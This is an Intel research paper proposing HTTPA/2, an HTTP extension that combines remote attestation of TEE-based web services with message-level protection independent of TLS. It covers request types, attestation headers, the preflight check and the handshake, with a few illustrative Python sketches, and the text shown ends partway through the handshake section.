3. Intel® Software Guard Extensions (Intel SGX). https://www.intel.com/content/www/us/en/architecture-and-technology/software-guard-extensions.html
4. Quote generation, verification, and attestation with Intel® Software Guard Extensions Data Center Attestation Primitives (Intel SGX DCAP)
5. Remote attestation
6. Amann, J., Gasser, O., Scheitle, Q., Brent, L., Carle, G., Holz, R.: Mission accomplished? HTTPS security after DigiNotar. In: Proceedings of the 2017 Internet Measurement Conference, pp. 325–340 (2017)
7. Bhardwaj, K., Shih, M.-W., Gavrilovska, A., Kim, T., Song, C.: Preserving end-to-end security for edge computing. SPX (2018)
8. Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Message Syntax and Routing. RFC 7230 (2014)
9. Fielding, R.T., Reschke, J.: Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content. RFC 7231 (2014)
10. Khare, R., Lawrence, S.: Upgrading to TLS Within HTTP/1.1. RFC 2817 (2000)
11. Knauth, T., Steiner, M., Chakrabarti, S., Lei, L., Xing, C., Vij, M.: Integrating remote attestation with transport layer security (2019)
12. Mononen, T., Kause, T., Farrell, S., Adams, C.: Internet X.509 public key infrastructure certificate management protocol (CMP). RFC 4210 (2005)
13. Rescorla, E.: HTTP over TLS. RFC 2818 (2000)
14. Rescorla, E., Dierks, T.: The transport layer security (TLS) Protocol Version 1.2. RFC 5246 (2008)
15. Selvi, J.: Bypassing HTTP strict transport security. Black Hat Europe, vol. 54 (2014)
HTTPA/2: A Trusted End-to-End Protocol for Web Services
Gordon King and Hans Wang
Intel Corporation, Santa Clara, USA
{gordon.king,hans.wang}@intel.com
Abstract. With the advent of cloud computing and the Internet, the commercialized website becomes capable of providing more web services, such as software as a service (SaaS) or function as a service (FaaS), for great user experiences. Undoubtedly, web services have been thriving in popularity that will continue growing to serve modern human life. As expected, there came the ineluctable need for preserving privacy, enhancing security, and building trust. However, HTTPS alone cannot provide a remote attestation for building trust with web services, which remains lacking in trust. At the same time, cloud computing is actively adopting the use of TEEs and will demand a web-based protocol for remote attestation with ease of use. Here, we propose HTTPA/2 as an upgraded version of HTTP-Attestable (HTTPA) by augmenting existing HTTP to enable end-to-end trusted communication between endpoints at layer 7 (L7). HTTPA/2 allows for L7 message protection without relying on TLS. In practice, HTTPA/2 is designed to be compatible with the in-network processing of the modern cloud infrastructure, including L7 gateway, L7 load balancer, caching, etc. We envision that HTTPA/2 will further enable trustworthy web services and trustworthy AI applications in the future, accelerating the transformation of the web-based digital world to be more trustworthy.
Keywords: HTTP · HTTPA · TLS · Protocol · Attestation · TCB · TEE · Secret · Key exchange · Confidential computing · Zero trust · Web service
1 Introduction
We received positive feedback and inquiries on the previous version of HTTPA [14] (HTTPA/1). As a result, we present a major revision of the HTTPA protocol (HTTPA/2) to protect sensitive data in HTTPA transactions from cyber attacks. Comparatively, the previous work [14] mainly focused on how to add remote attestation (RA) and secret provisioning to the HTTP protocol with Transport Layer Security (TLS) protection across the Internet, which is valuable, but it comes at a price. In contrast, HTTPA/2 does not need to rely on the TLS protocol, such as TLS 1.3 [22], for secure communication over the Internet. The design of HTTPA/2 follows the SIGMA model [16] to establish a trusted (attested) and secure communication context between endpoints at layer 7 (L7) of the OSI model. Different from connection-based protocols, HTTPA/2 is transaction-based, and the TEE is considered to be a new type of requested resource over the Internet. In addition to protecting sensitive data transmitted to TEE-based services (TServices), HTTPA/2 can potentially be used to optimize the end-to-end performance of Internet or cloud backend traffic, thus saving energy and reducing the operational costs of Cloud Service Providers (CSPs).
HTTP is a predominant Layer 7 protocol for website traffic on the Internet. HTTPA/1 [14] defines an HTTP extension to handle requests for remote attestation, secret provisioning and private data transmission, so Internet visitors can access a wide variety of services running in Trusted Execution Environments (TEEs) [13] to handle their requests with strong assurances. In this way, visitors’ Personally Identifiable Information (PII) and their private data are better protected when being transmitted from a client endpoint to a trusted service endpoint inside the TEE. HTTPA/1 supports mutual attestation if both client and service endpoints run inside a TEE. Although HTTPA/1 helps build trust between L7 endpoints with data-level protection, HTTPA/1 needs TLS to defend against attacks over the Internet, e.g., replay attacks and downgrade attacks. Note that TLS cannot guarantee end-to-end security for the HTTPS message exchange [5] when the TService is hosted behind a TLS termination gateway or inspection appliance (a.k.a. middleboxes). Despite the fact that TLS provides confidentiality, integrity and authenticity (ConfIntAuth) to ensure secure message exchange for the HTTPA/1 protocol, it is not a complete end-to-end security solution for serving web services at L7. For example, TLS termination on the middleboxes makes the message exchange highly vulnerable to cyber-attacks. Both HTTPA/1 and TLS need to generate key material through key exchange and derivation processes. This requires additional round trips at L5 and increases network latency. Thus, there is room to further optimize the network performance and reduce communication complexity by avoiding the repetition of key negotiations.
Due to the limitations of TLS mentioned above, a version of HTTPA with message-level security protection is a natural candidate to address all of these issues at once. This paper proposes an upgraded protocol, HTTPA/2, which makes it possible to secure HTTPA transactions even without the underlying presence of TLS. HTTPA/2 is designed to improve the processes of key exchange, RA and secret provisioning in HTTPA/1. It also enables end-to-end secure and trustworthy request/response transactions at L7, which are cryptographically bound to an attestable service base that can be trusted by Internet visitors regardless of the presence of untrusted TLS termination in between. The rest of the paper is organized as follows. Section 2 provides necessary preliminaries. Section 3 elaborates on the protocol transactions. Section 4 talks about security considerations. Section 5 concludes the whole paper.
G. King and H. Wang: Both authors contributed equally to this work.
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023. K. Arai (Ed.): FICC 2023, LNNS 652, pp. 824–848, 2023. https://doi.org/10.1007/978-3-031-28073-3_55
G. King and H. Wang
2
Technical Preliminaries
This section provides preliminaries related to the construction of HTTPA/2. We first introduce the use of a Trusted Execution Environment (TEE) in a web service setting. Then we describe several important primitives used to construct the HTTPA protocol described in Sect. 3.
2.1
Trusted Execution Environment (TEE)
In a TEE, trustworthy code is executed on data with CPU-level isolation and memory encryption, inaccessible to anyone, even those with system-level privileges. The computation inside the TEE is protected with confidentiality and integrity. A TEE is more trustworthy than a Rich Execution Environment (REE) [1], where code is executed on data without isolation. Although most web services are deployed in an REE, deploying web services in a TEE for better security is an emerging trend. A service initialized and run inside the TEE is known as a Trusted Service (TService). A TService uses the TEE to effectively reduce its trusted computing base (TCB), which is the minimal totality of hardware, software, or firmware that must be trusted for security requirements, thus keeping the attack surface as small as possible.
Some TEEs, such as Intel® Software Guard Extensions (Intel® SGX) or Intel® Trust Domain Extensions (Intel® TDX), can provide evidence (which we call the “Attest Quote (AtQ)” in Sect. 2.2) reflecting configuration and identities [11] to a remote relying party. Once the relying party has successfully verified the evidence and is convinced by the result, both parties finish the RA process [3,6]. With the RA completed successfully, a TService can be shown to be more trustworthy to its relying party. Not all TEEs are attestable, and HTTPA is only applicable to attestable TEEs, which can generate such evidence for the purpose of RA.
2.2
Attest Quote (AtQ)
AtQ is an opaque data structure signed by a Quoting Service (QService) with an attestation key (AK). It can also be called a quote [19] or evidence, and it is used to establish trustworthiness through identities. For this purpose, the quote encapsulates the code identity, ISV identity, TEE identity, and various security attributes, e.g., the security version number (SVN) of a TEE [2], associated with a TService instance. A relying party can examine the quote via a verification infrastructure to determine whether the TService is trustworthy. The quote is not a secret, but its uniqueness, integrity and authenticity (UniqIntAuth) must be ensured. Quote generation involves cryptographically measuring the instantiated TCB and signing the measurements, together with a nonce, with an AK. The AtQ accommodates a piece of user-defined information, called Quote User Defined Data (QUDD). The QUDD can provide extra identities specific to a TService. Therefore, the AtQ can in turn help protect the integrity of
Attest Header Lines (AHLs) during the handshake phase, which we discuss in Sect. 3.2. It is worth noting that not all quotes are the same, especially if they are structured by different vendors, so a label indicating the quote type should be attached to the AtQ.
2.3
Attest Base (AtB)
AtB is the totality of computing resources serving client request handling, including hardware, firmware, software, and access controls, which work together to deliver trustworthy service quality with an enforced security/privacy policy. It can also be considered as a group of collaborating TService instances, each running in its own attestable TEE, which are capable of proving the integrity of the execution state. In this paper, the computing resources of a TService are offered by the AtB and made accessible to the client through a series of trusted transactions. How those trustworthy services are attested is determined by the policy specified in the handshake phase. We suggest using a single TService instance for each AtB to reduce the complexity and attack surface as much as possible. The AtB serving a particular service tied to a Uniform Resource Identifier (URI) should be directly or indirectly attested by a client through the HTTPA/2 protocol. In the case of an AtB formed by multiple TService instances, an upfront TService instance takes responsibility for performing local attestation on the rest of the TService instances to establish trustworthy relationships with them. After that, the upfront TService can selectively collect their quotes for client-side verification during the HTTPA/2 handshake phase.
2.4
Three Types of Request
There are three types of request defined by the HTTPA/2 protocol: Un-trusted Request (UtR), Attest Request (AtR), and Trusted Request (TrR). UtR is used in HTTP transactions; AtR is used in the transactions of both Attest Handshake (AtHS) and Attest Secret Provisioning (AtSP); TrR is used in trusted transactions. For convenience, we refer to the AtR and TrR as “HTTPA/2 requests”. Regarding the HTTP method, we propose a new HTTP method, called “ATTEST”, to perform the transactions of AtHS and AtSP. An HTTP request using the ATTEST method is called an AtR. Regarding HTTP header fields, we propose to augment them with additional ones called Attest Header Fields (AHFs), prefixed with the string “Attest-”. A request without AHFs must be a UtR in terms of HTTPA/2. The AHFs are dedicated to HTTPA traffic. For example, they can be used to authenticate the identity of HTTPA/2 transactions, indicate which AtB to request, convey confidential metadata (see Sect. 2.7), provision secrets, present tickets (see Sect. 2.5), etc.
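The distinction between the three request types can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the function and enum names are hypothetical, header names are compared case-insensitively, and an ATTEST request that carries no AHFs is classified as a UtR because the text states that a request without AHFs must be a UtR.

```python
from enum import Enum


class RequestType(Enum):
    UTR = "Un-trusted Request"
    ATR = "Attest Request"
    TRR = "Trusted Request"


# AHFs are prefixed with "Attest-"; the prefix is matched case-insensitively.
AHF_PREFIX = "attest-"


def classify_request(method: str, headers: dict[str, str]) -> RequestType:
    """Classify a request as UtR, AtR, or TrR from its method and header names."""
    has_ahf = any(name.lower().startswith(AHF_PREFIX) for name in headers)
    if not has_ahf:
        # Without AHFs, the request is a UtR in terms of HTTPA/2.
        # Assumption: this also applies to an ATTEST request without AHFs.
        return RequestType.UTR
    if method == "ATTEST":
        # ATTEST method plus AHLs: used for AtHS and AtSP.
        return RequestType.ATR
    # Any other method carrying AHLs is treated as a TrR.
    return RequestType.TRR
```

For instance, `classify_request("POST", {"Attest-Base-ID": "..."})` yields `RequestType.TRR`, while the same request without any Attest- header yields `RequestType.UTR`.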
The last term is the AHL, which consists of an AHF and its values in a standard form [21]. We use it to signify a single piece of annotated data associated with the current HTTPA/2 request.
Un-Trusted Request (UtR). The UtR is simply an ordinary HTTP request, which neither uses the ATTEST method nor contains any AHLs. Before a UtR reaches a TService, it can easily be eavesdropped on or tampered with along the communication path. Even when protected by TLS, it can still be attacked when crossing any application gateway or L7 firewall, since those intervening middleboxes are un-trusted and terminate TLS connections hop by hop [5]. Therefore, there is no guarantee of ConfIntAuth. That is why the TService cannot treat the request as trustworthy, although it can still handle a UtR if allowed by the service-side policy. For the sake of security, we do not recommend that a TService handle any UtR.
Attest Request (AtR). The AtR is an HTTP request equipped with both the ATTEST method and AHLs for AtHS and AtSP. If any AtR is not successfully handled by the corresponding TService, subsequent TrRs, described in Sect. 2.4, will no longer be accepted by this TService. The major differences between the AtR used in AtHS and the one used in AtSP are as follows:
AtHS. The AtR used in AtHS is designed to request all the resources necessary for handling the AtR used in AtSP and the TrRs. For example, one of the most important resources is the AtB (see Sect. 2.3), which may be scheduled or allocated by a server-side resource arbiter. Typically (but not always), an upfront TService can directly designate itself as the AtB for this client. For a complete explanation, see Sect. 3.2. In addition, this AtR should not be used to carry any confidential information, because the key material cannot be derived at this moment.
The TService, however, can encrypt sensitive data in the response message, since it has already received the required key share from the client and is able to derive the key material for encryption.
AtSP. The AtR of AtSP is optional and may not be present in the HTTPA/2 traffic flow, since in some cases the TService does not need any AtB-wide secrets provided by the client to work. In the common case, the TService needs secret provisioning to configure its working environment, e.g., to connect to databases or to set up signing keys and certificates. This AtR must be issued after all TEE resources have been allocated through the AtHS transaction described above. It is worth noting that this request is not required to be issued before any TrR (see Sect. 2.4). With such flexibility, the TService can get extra information or perform some operations beforehand through preceding TrRs. Importantly, this AtR is responsible for provisioning AtB-wide secrets, such as key credentials, tokens, and passwords, to the AtB. Those secrets are wrapped by an encryption key derived from the key exchange in the AtHS phase (see Sect. 3.2).
Furthermore, the TService must ensure that those provisioned secrets are erased after use, when the AtB is released, or when any failure occurs in processing the AtR. For a complete explanation, see Sect. 3.3.
The two kinds of AtR introduced above are the core of the HTTPA/2 protocol. Both of them can be treated as GET request messages to save an RTT, and they can also be used to transmit protected sensitive data in both directions, except for the AtR of AtHS, whose key exchange is not yet complete, as noted earlier.
Trusted Request (TrR). The TrR can be issued right after a successful AtHS (see Sect. 2.4), in which an AtB is allocated. Although the TrR does not use the ATTEST method, it should contain AHLs to indicate that it is a TrR and not a UtR. In other words, the TrR is nothing but an ordinary HTTP request with some AHLs. One of those AHLs must be the AtB ID, which determines which AtB is targeted in addition to the specified URI. With that, the TrR can be dispatched to the proper TService for handling. In essence, the TrR is designed to interact with a TService for sensitive data processing. HTTPA/2 must ensure the ConfIntAuth of a set of selected data, which may be distributed within the message body or even in the header or request line, for end-to-end protection. Consequently, unlike TLS, HTTPA/2 does not protect every byte of a message. As a result, HTTPA/2 may not be suitable for certain scenarios, e.g., when one simply wants to encrypt all traffic bytes hop by hop. In most cases, however, HTTPA/2 can offer a number of obvious benefits without TLS. For example, users do not need to worry about data leakage due to TLS termination, and they can save the resources required by TLS connections. In some special cases, HTTPA/2 can be combined with TLS to provide stronger protection, but the performance overhead can be significant (see Sect. 2.8).
There are many potential ways to optimize Internet service infrastructures and platforms by adopting HTTPA/2, since the insensitive part of HTTPA/2 messages can serve as useful hints to improve the efficiency of message caching, routing/dispatching, risk monitoring, malicious message detection and so on, while helping protect sensitive data in motion as well as during processing by the client-chosen TServices.
2.5
Attest Ticket (AtT)
AtT is a type of AHL used to ensure the integrity and authenticity (IntAuth) of the AHLs, as well as their freshness, by applying AAD to each HTTPA/2 request, except for the AtR of AtHS, which is the initiating request of the handshake. The AtT is required to be unique and for single use so as to mitigate replay attacks; in practice, this can be ensured by AAD. Moreover, the AtT should be appended at the very end of the request body as the last trailer [9], because there might be a TrC or other trailers that need to be protected by the AtT as well. The AtR of AtHS has no protection from the AtT, because no derived keys are available at such an early stage. In order to protect
the AtR of AtHS, we can use either a client-side quote or a pre-configured signing key to ensure the IntAuth instead of the AtT. Typically, there are four situations to consider: mHTTPA, client with CA-signed certificate, client with self-signed certificate, and nothing to provide.
Mutual HTTPA (mHTTPA). With mutual HTTPA, the client must run in a TEE as a TEE-based client (TClient), which is capable of generating a client-side AtQ. The AtQ can be used to ensure the IntAuth of the AtR by including the digest of the AHLs in its QUDD, and the server side should have a proper trusted attestation authority to verify it. This is the recommended approach to build mutual trust between TClient and TService, but the client side usually lacks TEE support.
Client with CA-Signed Certificate. In this case, the client signs the AHLs of the AtR along with a trusted certificate, and the TService should be able to verify the signature with the respective CA certificate chain. This helps the TService identify the user. In addition, mHTTPA can be enabled at the same time, if possible, to make the exchange more secure and trustworthy on both sides.
Client with Self-signed Certificate. In this situation, the client should sign the AHLs of the AtR using a temporary signing key, and the TService should verify the signature using the client’s self-signed certificate enclosed in the same AHL. This approach is not safe, since the TService may receive a compromised AtR.
Nothing to Provide. There is no way to protect the integrity of the AHLs under these circumstances. We recommend at least using a temporarily generated signing key with the corresponding self-signed certificate. It is worth noting that even if the AHLs of the AtR are compromised, the client is able to detect the problem by checking the received AtQ of the TService, as the QUDD embedded in the AtQ ensures the integrity of the AHLs in both the request and response messages.
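The idea of binding the AHLs to a quote through a digest placed in the QUDD can be illustrated as follows. This is a minimal sketch, not the encoding used by HTTPA/2: the canonicalization (lower-cased names, sorted order, length-prefixed fields), the choice of SHA-256, and the helper names `ahl_digest` and `qudd_matches` are all assumptions made for the example. Verifying the quote itself, which must happen before its QUDD is trusted, is outside the scope of the sketch.

```python
import hashlib
import hmac


def ahl_digest(headers: dict[str, str]) -> bytes:
    """Return a SHA-256 digest over the Attest-* header lines of a message."""
    ahls = sorted(
        (name.lower(), value.strip())
        for name, value in headers.items()
        if name.lower().startswith("attest-")
    )
    h = hashlib.sha256()
    for name, value in ahls:
        # Length-prefix every part so that two different header sets
        # cannot serialize to the same byte string.
        for part in (name.encode(), value.encode()):
            h.update(len(part).to_bytes(4, "big"))
            h.update(part)
    return h.digest()


def qudd_matches(headers: dict[str, str], qudd: bytes) -> bool:
    """Check that a QUDD taken from an already verified quote covers these AHLs."""
    return hmac.compare_digest(ahl_digest(headers), qudd)
```

A sender would place `ahl_digest(headers)` in the QUDD when requesting its quote; the receiver recomputes the digest over the AHLs it actually received and rejects the message if `qudd_matches` returns `False`, which is how a modified AHL would be detected.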
It is difficult for the client to prove its identity with only a self-signed certificate, let alone with nothing to provide. Again, if the server also wants to identify the client at the initiating request (the AtR), we recommend that the client combine the mHTTPA and CA-signed certificate approaches to establish a strong trust relationship between TClient and TService. Otherwise, the client must detect whether any unexpected changes occurred in the AHLs of the AtR, as an additional critical step to defend against Man-in-the-Middle (MITM) and downgrade attacks.
2.6
Attest Binder (AtBr)
AtBr is a type of AHL used to ensure the binding between an HTTPA/2 request and the corresponding response. The AHL of the AtBr should be added to the response message as the last trailer [9]. The AtBr typically holds a Message Authentication Code (MAC) that protects two components: all AHLs of the current response,
and the value of the AtT in its corresponding request. Other cryptographic algorithms for encryption and message authentication can also be chosen, e.g., Authenticated Associated Data (AAD) or Authenticated Encryption with Associated Data (AEAD) [18], to ensure the IntAuth of the AtBr. The AtBr should be present in all HTTPA/2 response messages, except for the response to the AtR in the AtHS phase (see Sect. 3.2), because the quote of the TService achieves the same purpose without the help of the AtBr.
2.7
Trusted Cargo (TrC)
The TrC can appear in both HTTPA/2 request and response messages, except for the AtR of AtHS. The TrC serves as a vehicle to carry confidential information that needs to be protected by authenticated encryption (AE). The TrC can be used to protect sensitive metadata such as the data type, location, size, and key index, which indicate where the ciphertext or signed plaintext is located in the message body. The key index indicates which key should be used to decrypt the encrypted messages or verify the message’s integrity. Potentially, much useful metadata could be included in the TrC, but it should be kept to a minimum, as size limits might be enforced by intermediaries on the network path. This paper does not define how to structure or parse the metadata; we leave this to future extensions of HTTPA/2 or to application-specific customization. Finally, the TrC should be put in a trailer [9], since its variable length affects the position information it contains. Again, the value of the TrC must be protected against eavesdropping and manipulation by means of AE.
2.8
Trusted Transport Layer Security (TrTLS)
HTTPA/2 protects the selected parts of an HTTP message. If users want to protect the entire HTTP message, i.e., every bit of it, TLS can leverage HTTPA/2 to establish a secure connection at L5 between the client and its adjacent middlebox, which we call TrTLS. TrTLS makes use of AtHS to transmit the HELLO messages of TLS [22] to the client and the TService, respectively, for the handshake. This makes the initial handshake of the secure transport layer protocol trustworthy. We consider three cases of endpoints as follows:
TClient. In the case of a TClient endpoint, the TClient leverages its QUDD to ensure the IntAuth of the client HELLO message used to establish the TLS connection. The server-side verifier helps verify the QUDD. If the attestation is successful, the trusted endpoint of the TClient is established as TrTLS. Note that the TrTLS module should be co-located in the same TEE as the TClient.
Frontend TService. The frontend TService is defined as a TService that can communicate with the client without any L7 middleboxes in between. In other words, the communication between the TService and the client has no TLS
terminators. This implies that the TService can establish a secure transport layer connection directly with its client. Thus, the IntAuth of the server-side HELLO message can be fully protected by the QUDD of the TService, in a way similar to the TClient case above but in the reverse direction.
Backend TService. In the case of a backend TService endpoint, the secure transport layer connection is terminated by at least one middlebox, e.g., an application gateway, reverse proxy, or L7 load balancer. Although the TService has no direct connection with its client, a trusted TLS connection between the client and the first middlebox can be established by checking the results of RA from the backend TService. The middlebox needs to confirm that the mapping of the request and the response with the backend TService is correct in order to decide whether to use the results of RA to build a trusted connection. Admittedly, in terms of full traffic encryption, this is the least trustworthy of the three configurations, because the attack surface includes the vulnerable middleboxes in the TrTLS connection.
After the initial messages are exchanged through AtHS, the encrypted channel can be established under HTTPA/2 at L5, so the subsequent traffic is encrypted and inherits the attested assurances of the TEE from HTTPA/2. If an ordinary TLS connection exists prior to HTTPA/2, the TrTLS mechanism can disconnect the already built TLS connection and then seamlessly re-establish a trustworthy one. We present only the high-level concept of TrTLS in this paper and may discuss more details in another paper.
3
Protocol Transactions
In this section, we provide detailed definitions of all HTTPA/2 transactions.
3.1
Preflight Check Phase
The preflight request gives the Web service a chance to see what the actual AtR looks like before it is made, so the service can decide whether it is acceptable. In addition, the client endpoint performs the preflight check as a security measure to ensure that the visited service understands the ATTEST method, the AHFs, and their implied security assurance. To start HTTPA/2, a client can optionally issue a preflight request to check whether the Web service, specified by the URI in the request line, is TEE-aware and prepared for AtHS. If the client is a Web browser, the preflight request can be issued automatically when the AtR qualifies as “to be preflighted”. We need the preflight transaction because it is a lightweight HTTP OPTIONS [10] request, which consumes far fewer computing resources than the AtR. Caching the preflight result avoids re-checking during a specified time window.
Passing this check does not guarantee that the AtR can be successfully handled by this service. For example, the TService may run out of resources, or the client’s cipher suites may not be supported. The preflight is an idempotent operation, i.e., there is no additional effect if it is called more than once with the same input parameters. The client can also use the preflight to detect the capabilities of the AtB (see Sect. 2.3) without implying any real actions.
Fig. 1. Preflight transaction
As shown in Fig. 1, an OPTIONS request should be honored by an HTTPA/2-compliant TService. The preflight transaction uses standard header fields (HFs) to specify the method and the AHLs that will be sent later to the same TService if they are acceptable. Those HFs are described as follows:
1. HFs in request message
(a) Access-Control-Request-Method
This HF carries a list of methods, indicating that the ATTEST method will be used in the next request if the service supports it.
(b) Access-Control-Request-Headers
This HF carries a list of field names, indicating that the AHFs will be included in the next request if the service supports them.
2. HFs in response message
(a) Allow
This HF carries the list of methods supported by the visited service. It must contain the ATTEST method for the client to proceed with the AtR; otherwise, the AtR is not acceptable to this service and will be denied if received.
(b) Access-Control-Allow-Headers
This HF carries a list of allowed AHFs. The client needs to check that all of the requested AHFs are contained in this field.
(c) Access-Control-Max-Age
This HF indicates how long the preflight check results can be cached.
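The client-side part of the preflight check described above can be sketched as follows. The helper names (`build_preflight`, `preflight_passed`) are hypothetical, header values are assumed to be comma-separated lists, and the response is modeled as a plain dictionary keyed by the exact field names used in this section, which is a simplification of real header handling.

```python
def parse_list(value: str) -> set[str]:
    """Split a comma-separated header value into a set of trimmed tokens."""
    return {item.strip() for item in value.split(",") if item.strip()}


def build_preflight(ahfs: list[str]) -> dict[str, str]:
    """Return the HFs of an OPTIONS preflight announcing ATTEST and the AHFs."""
    return {
        "Access-Control-Request-Method": "ATTEST",
        "Access-Control-Request-Headers": ", ".join(ahfs),
    }


def preflight_passed(requested_ahfs: list[str],
                     response: dict[str, str]) -> tuple[bool, int]:
    """Return (ok, max_age_seconds) for a preflight response."""
    allowed_methods = parse_list(response.get("Allow", ""))
    allowed_headers = {
        h.lower()
        for h in parse_list(response.get("Access-Control-Allow-Headers", ""))
    }
    # The service must allow ATTEST and every AHF the client intends to send.
    ok = "ATTEST" in allowed_methods and all(
        h.lower() in allowed_headers for h in requested_ahfs
    )
    # A failed check is not cached (an assumption of this sketch).
    max_age = int(response.get("Access-Control-Max-Age", "0")) if ok else 0
    return ok, max_age
```

The returned `max_age` tells the client for how many seconds the positive result may be cached before the preflight has to be repeated.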
3.2
Attest Handshake (AtHS) Phase
The AtHS phase contains a core transaction of HTTPA/2. In a single round trip time (one RTT), the AtR and its response accomplish three major tasks: key exchange, AtB allocation and AtQ exchange, as shown in Fig. 2:
1. Key Exchange
It is necessary to complete the key exchange process before any sensitive information can be transmitted between the client and the TService. The exact steps vary depending on the key exchange algorithm used and the cipher suites supported by both sides. In HTTPA/2, the key exchange process follows TLS 1.3 [22] and recommends a set of key exchange methods to meet evolving needs for stronger security. Insecure cipher suites are excluded, and all public-key-based key exchange mechanisms provide Perfect Forward Secrecy (PFS), e.g., Ephemeral Elliptic Curve Diffie-Hellman (ECDHE). Note that it is mandatory that fresh ephemeral keys be generated, used, and destroyed afterward [20] inside the TEE of the TService. When the key exchange is completed, we recommend using the HMAC-based Extract-and-Expand Key Derivation Function (HKDF) [15] as the underlying primitive for key derivation. We describe the key negotiation between the client and the TService in terms of the AHFs set in the request and response, respectively, as follows:
(a) AHFs in request message (or AtR):
i. Attest-Cipher-Suites
A list of cipher suites that indicates the AEAD algorithm/HKDF hash pairs supported by the client.
ii. Attest-Supported-Groups
A list of named groups [17] that indicates the (EC)DHE groups supported by the client for key exchange, ordered from most preferred to least preferred. The AHL of Attest-Key-Shares contains the corresponding (EC)DHE key shares, e.g., public keys, for some or all of these groups.
iii. Attest-Key-Shares
Its value contains a list of the client’s cryptographic parameters for the supported groups indicated in the AHL of Attest-Supported-Groups for negotiation. The corresponding data structure is described in TLS 1.3 [22]. Generating those parameters is a time-consuming operation (see 3.1 in Fig. 2).
Fig. 2. Attest handshake (AtHS) transaction
iv. Attest-Random
A 32-byte random nonce, which is used by the TService to derive the master secret and other key materials. The purpose of the random nonce is to bind the master secret and the keys to this particular
handshake. This mitigates replay attacks on the handshake as long as each peer properly generates this random nonce.
(b) AHFs in response message
i. Attest-Cipher-Suite
It indicates the selected cipher suite, i.e., a symmetric cipher/HKDF hash pair for HTTPA/2 message protection.
ii. Attest-Supported-Group
It indicates the selected named group used to exchange the ECDHE key share generated by the TService.
iii. Attest-Key-Share
Its value contains the TService’s cryptographic parameters accordingly (see 3.7 in Fig. 2).
iv. Attest-Random
It works in the same way as Attest-Random in the request, except that it is used by the client to derive the master secret and other key materials.
This handshake establishes one or more input secrets, which are combined to create the actual keying materials. The key derivation process (see 3.9, 3.15 in Fig. 2), which makes use of HKDF, incorporates both the input secrets and the AHLs of the handshake. Note that anyone can observe this handshake process if it is not protected by byte-to-byte encryption at L5, but this is safe, since the secrets of the key exchange process are never sent over the wire.
2. AtB Allocation
This task takes care of resource allocation. The upfront TService needs to prepare the essential resources before assigning a unique AtB identifier to the AtB. The client uses this identifier to ask the TService to process its sensitive data on this AtB (see 3.6 in Fig. 2).
(a) AHFs in request message (or AtR):
i. Attest-Policies
It can contain various types of security policies, which can be selectively supported by this AtB of the TService. There are two aspects to consider:
Instances attestation
direct: all instances should be verified by the client.
indirect: only the contact instance should be verified by the client remotely.
Un-trusted requests
allowUntrustedReq: it allows UtRs to be handled by the TService on this AtB (disabled by default).
ii. Attest-Base-Creation
It specifies the method used to create the AtB. Several options are available:
New
The AtB should be newly created for the client to use. If the contact TService is a new one, it can be assigned to this client immediately.
Reuse
This option allows a reusable AtB to be used by this client, but the AtB should ensure that all traces associated with the previous client are erased. So far, no TEE can strictly provide this security feature, and we cannot fully rely on software to emulate it. As a result, the client should evaluate the risks before specifying this option.
Shared
A shareable AtB can be allocated to this client. The client does not care whether it is a clean base or not. Use this option with caution.
iii. Attest-Blocklist
It indicates a list of blocked identities and other types of identifiers, which allows the TService to filter out unqualified AtBs beforehand. This feature is used to optimize the performance of AtB allocation, as it is expensive and inefficient to rely only on the client to collect a set of TService instances by trial and error.
(b) AHFs in response message:
i. Attest-Base-ID
This identifier signifies the allocated AtB, which has been tied to the particular client that sent the AtHS request. It should be used in subsequent HTTPA/2 requests to ensure that those requests can be efficiently dispatched to TServices. The HTTPA/2 request dispatcher may not be trustworthy and is not able to check the integrity of those requests. As a result, it cannot guarantee that they are delivered to their matched AtBs. To remedy this problem, the dispatcher should identify invalid AtB IDs where possible, and the receiving TService should validate the ID right after the integrity check (see 4.2 in Fig. 3, 5.2 in Fig. 4). Note that the max-age directive set here indicates how long this AtB can be kept alive on the server side.
3. AtQ Exchange
In HTTPA/2, a successful RA [6] increases the client’s confidence by assuring that the targeted services run inside a curated and trustworthy AtB. The client can also determine the level of trust in the security assurances provided by TServices through the AtB. RA is mainly intended for provisioning secrets to a TEE. In this solution, we leverage this mechanism as the root of trust of HTTPA/2 transactions instead of certificate-based trust, e.g., TLS. To facilitate this, we integrate RA with the key exchange mechanism above to perform a handshake, which passes the assurance on to the derived ephemeral key materials (see 3.9 in Fig. 2). Those keys can in turn be used to wrap secrets and sensitive data designated by the client or the TService in either direction.
During the RA process, the AtQ (see Sect. 2.2) plays a key role in attesting the TService. It provides evidence (a quote) to prove the authenticity of the relevant TService (see 3.8 in Fig. 2). The client can rely on it to decide whether the TService is a trustworthy peer [8]. To appraise the AtQ, we need a trusted authority to act as the verifier, which performs the AtQ verification and reports issues with this AtQ, e.g., TCB issues (see 3.12 in Fig. 2). The verification result produced by the verifier should be further assessed by the client according to its pre-configured policy rules and applied security contexts. Importantly, the TService should ensure the integrity and authenticity of all AHLs of the AtR and its response through the QUDD of the AtQ, and vice versa in the case of mHTTPA/2. The following AHFs should be supported by the HTTPA/2 protocol for RA.
(a) AHFs in request message (or AtR):
i. Attest-Quotes
It can only appear in mHTTPA/2 mode, to indicate a set of AtQs generated by the TClient for the targeted TService to verify (see 3.2, 3.3, 3.4, 3.5 in Fig. 2). These quotes should be used to ensure the IntAuth of the AHLs of this AtR through their QUDD. Note that the max-age directive indicates when these quotes become outdated, at which point their cached verification results should be cleared from the AtB to avoid broken assurance. In addition, all client-side quotes must be verified by the server-side verifier and validated by the TServices before an AtB ID can be issued.
(b) AHFs in response message
i. Attest-Quotes
It is mandatory for an AtB to present its AtQs to the client for client-side verification. The IntAuth of the AHLs of both the AtR and its response should be ensured by the QUDDs of these AtQs to protect the transaction completely. The client must verify the AtQs to authenticate the identities of the remote AtB (see 3.8, 3.10, 3.11, 3.12 in Fig. 2). The client should not trust anything received from the TService before the AtQs are successfully verified and evaluated. Whether the integrity of the AHLs holds should be determined by client-side security policies. Note that parts of the TService quotes can be selectively encrypted through the TrC to hide identity information.
There are several remaining AHFs, which are important to this transaction as they provide other necessary information and useful security properties:
(a) AHFs in request message
i. Attest-Versions
The client presents an ordered list of supported versions of HTTPA to negotiate with its targeted TService.
ii. Attest-Date
It is the Coordinated Universal Time (UTC) at which the client initiates an AtHS.
iii. Attest-Signatures
